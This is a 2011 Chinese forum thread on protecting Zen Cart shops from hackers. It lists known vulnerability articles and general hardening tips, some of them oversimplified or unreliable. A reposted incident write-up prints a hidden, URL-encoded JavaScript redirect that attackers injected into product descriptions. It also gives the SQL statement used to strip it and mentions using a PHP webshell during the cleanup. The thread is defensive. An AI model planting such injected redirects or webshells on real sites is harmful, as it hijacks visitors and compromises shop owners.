网站防黑之我见--看Fackhacker人肉黑客文字有感.

Zen Cart的安装、设置、升级讨论和使用技巧交流

版主: shaning

zencart 发帖图标 网站防黑之我见--看Fackhacker人肉黑客文字有感.

帖子free265 » 2011-06-11 10:45

很久以前,我失业的时候,做过一些空间商的联盟,介绍客户购买LP等等的产品,帮助一些不太懂电脑的或者怕麻烦的站长和外贸老板做一下配置,从空间商那里拿到一点分成,虽然没赚到大钱,但过的还充实吧,也没有人反映过网站被黑的事情. 只是前几天,我收到一封邮件,说我是黑客,还说网上有我们的照片.我百度一下,果真有人在诽谤我。 看完那些文字,我觉得那作者很可怜,又很可恨。 可怜的是,他说他的网站被人入侵很多次,他竟然无所作为,从来没有去思考怎么去防止黑客,而把黄金时间都用来寻找黑客去了,一直也没有抓到黑客.可恨的是,他在没有调查清楚的情况下,对与黑客事件无关的人进行诽谤,不惜一切代价,没有顾被诽谤对象的安危,没理会事情是真是假,从没有悔过之意.
我在论坛搜索了一下,发现网站被黑的人还真不少.论坛里有很多对黑客攻击很无助很愤怒的朋友。在介绍防黑办法是之前,特别提示一下做代购业务的朋友,帮别人代购的时候, 千万不可以填写自己的资料,特别是QQ邮箱!因为,这样可能会招致很多麻烦,甚至怎么死都不知道怎么回事.

那个一直在寻找黑客的仁兄到底是什么原因被入侵呢,他找到这里来,我猜他是用Zen cart建站的吧,Zen cart是个很优秀的购物车系统,但到底是什么原因,会让黑客有机可乘呢?
我们百度一下"zen cart 漏洞" ,相关链接: http://www.baidu.com/s?wd=zen+cart+%C2% ... nputT=4172 , 发现,这个系统旧的版本还是有问题的.
介绍漏洞的相关文章如下:
zen cart 1.38a多处漏洞分析
http://www.176ku.com/anquan/phpcms/201010/13961.html
Zen Cart SQL注入漏洞
http://sebug.net/vulndb/3989/
Zen Cart 商城系统,上传、跨站漏洞利用
http://www.myhack58.com/Article/html/3/ ... /30612.htm
Zen Cart record_company.php模块远程代码执行漏洞
http://www.nsfocus.net/vulndb/13532
Zen Cart admin/sqlpatch.php模块SQL注入漏洞
http://www.heibai.net/article/info/info ... foid=48570
Zen Cart "admin_email" SQL注入漏洞
http://www.51cto.com/art/200512/13304.htm
Zen Cart多个远程安全漏洞
http://www.nsfocus.net/vulndb/15834
zen cart 多处高危漏洞修补
http://blog.sina.com.cn/s/blog_65cf777d0100ofz0.html
看来Zen cart老版本的问题确实不少,这些文章看起来有点乱,但就没有办法了吗? 不是的,我觉得被入侵的更多原因是防范知识欠缺和防范意识不强.
我们定期上论坛查看有什么新漏洞补丁,定期升级程序的版本,修改管理后台的目录,就能防止绝大多数的攻击. 另外,不要随便使用别人制作的程序或者模板,一个商业网站,安全性很重要,如有必要,需要找专业的安全检测公司来检验.

一个程序,不管是多优秀,有一点点问题是在所难免的. 那有没有万能的防黑方法呢? 我做代办主机业务的时候,是这样建议客户的,也极少发生网站被入侵的情况.
首先, 网站操作系统的安全要做好. 如果你只做一个小网站,流量也不大,建议购买大空间商的虚拟主机就行,也省事. 一般他们的操作系统有专业人士做安全设置,出现问题的可能性几乎为零.
对了购买独立主机或者VPS的朋友,一定要随时做好操作系统的更新工作,及时打好补丁,不会升级吧?随便下载个360到你的服务器上,它就自动帮你打上所有的系统补丁了,省时省力.
其次, 网站目录一定要严格限制写入权限,比如,我们把网站目录全部禁止写入,那些什么上传漏洞,都不算是漏洞了,因为黑客无法上传任何东西都你的网站,这样就能确保你网站的安全.
会用Linux系统的最好用Linux,因为懂Linux的人少,研究入侵Linux的人更少.我客户的那些Linux服务器,几乎没出问题,有人问,Linux系统那么复杂,怎么办,其实,这个一点也不难办,Linux装上个虚拟主机管理面板,比你Windows还方便.
我想到的大约这么多,各位朋友欢迎你们一起来交流,有事可以发邮件给我.
free265
普通会员
普通会员
 
帖子: 40
注册: 2011-06-09 9:13

Re: 网站防黑之我见--看Fackhacker人肉黑客文字有感.

帖子free265 » 2011-06-11 11:26

没人顶贴我就自己顶一下,希望能认识论坛里志同道合的朋友们.
free265
普通会员
普通会员
 
帖子: 40
注册: 2011-06-09 9:13

Re: 网站防黑之我见--看Fackhacker人肉黑客文字有感.

帖子zhjhqk » 2011-06-11 15:56

MARK
zhjhqk
VIP会员
VIP会员
 
帖子: 396
注册: 2010-09-21 10:16

Re: 网站防黑之我见--看Fackhacker人肉黑客文字有感.

帖子a14114792 » 2011-07-31 16:04

好东西呀!
a14114792
中级会员
中级会员
 
帖子: 81
注册: 2010-10-28 17:46
QQ 帐号: 14828959

Re: 网站防黑之我见--看Fackhacker人肉黑客文字有感.

帖子zhu0927 » 2011-08-06 15:16

支持
zhu0927
普通会员
普通会员
 
帖子: 25
注册: 2010-03-22 15:39
QQ 帐号: 1114297073

Re: 网站防黑之我见--看Fackhacker人肉黑客文字有感.

帖子haohaohao » 2011-08-17 14:45

支持
haohaohao
 
帖子: 3
注册: 2010-12-12 12:27

Re: 网站防黑之我见--看Fackhacker人肉黑客文字有感.

帖子雅僧-佛公子 » 2011-08-25 11:23

这个是我从别人上面看到的一种攻击手段 希望看过的朋友们要小心了 要时刻检查自己的网站 更不要轻易的曝光自己的网站(转自别人的)


事件回放结束,开始入题。

从现象上分析“遇到英文浏览器自动跳转”,很显示是网站代码的问题,排队了域名劫持的可能性。网站采用的是Zen Cart程序,首先声明下哥对这个东西并不熟悉哦!但解析思路是有的,首页看下网站首页有没有可疑的JS代码。很为判断浏览器的代码都是以JS代码来实现的。



打开网站首页从浏览器,查看-源文件。先搜索下跳转到的URL地址的关键字,7louisvuitton.com未发现结果。接下来只能一行行看代码了,严格注意js的代码。从头到尾看了半天仍然未发现可疑的代码。这个看似有些难度了。接着进入后台,利用Zen Cart源码搜索功能搜索下关键字。执行过,文件都查一遍仍然没找到。



这时接过FTP用户密码信息,操刀上了php webshell。利用文件查找功能对网站文件进行全面的关键字搜索,反复查找都没有结果。看来这东西要么是存在数据库中,要么就是换了url地址了。百度下zen cart模板使用,关键的几个部分都手动查找下,仍然没发现结果。



这时又去网站页面的商品页仔细打量了一番,在注释这里<!--bof Product description -->发现了一段进行编码过的js。



感觉有些问题,马上拿出url解码器来看。




发现两段代码:
01.<script language="javascript" src="http://count40.51yes.com/click.aspx?id=401446169&logo=6" charset="gb2312"></script> 这个是流量统计

01.<script language="JavaScript">
02.<!--
03.var la=navigator.browserLanguage.toLowerCase();
04.if(la=='en-us') document.location = 'http://ii3v.com/b';
05.// -->
06.</script>
07. 这个就是关键了,判断浏览器版本是en-us 就跳。。。哈哈,很犀利啊。

这里跳转的URL和关键字的那个是同一个网站。

下面发现了代码就好说了,商品应该是模板的问题吧。马上找到模板。
templates\template_default\templates\tpl_document_product_info_display.php



内容就一个变量<?php echo stripslashes($products_description); ?>,郁闷了。没玩过Zen Cart。不知道这个变量从哪来的了。找了半天没头绪了,只好去数据库看下了。利用php webshell 备份功能连接进了数据库,看到库里正好有一个products_description的表,马上备份下载之。

本地mysql还原之

相关命令

01.mysql -uroot -p123456
02.
03.create database aaa;
04.
05.use aaa;
06. 07.source d:\1.sql;
08. 恢复后
果然发现在商品描述的表前面都被插入了这段代码。




利用批理替换,马上恢复了正常。


代码如下:


update products_description set products_description =replace (products_description,'<div style="display:none"><script language="javascript" src=" http://%63%6F%75%6E%74%34%30%2E%35%31%7 ... 169&logo=6" charset="gb2312"></script><script><!--
document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%20%0D%0A%3C%21--%20%0D%0Avar%20la%3Dnavigator.browserLanguage.toLowerCase%28%29%3B%0D%0Aif%28la%3D%3D%27en-us%27%29%20document.location%20%3D%20%27http%3A//%69%69%33%76%2E%63%6F%6D/b%27%3B%0D%0A//%20--%3E%20%0D%0A%3C/script%3E"));//--></script></div>','')




下面的任务就是查找php木马与后门,升级Zen Cart至最新了。

至此任务完成,这可算是比较犀利的seo攻击法啊。

其实zen cart模板都是PHP的,很多人做的模板有后门放在网上。插入了统计代码在里面,使用被使用就会被利用。小心网上的模板哦```

后来发现zen cart不少同学都出现类似的问题``
topic115394.html
雅僧-佛公子
 
帖子: 3
注册: 2011-08-25 10:29


  • 相关话题
    回复总数
    阅读次数
    最新文章

回到 安装设置



在线用户

正在浏览此版面的用户:没有注册用户 和 3 位游客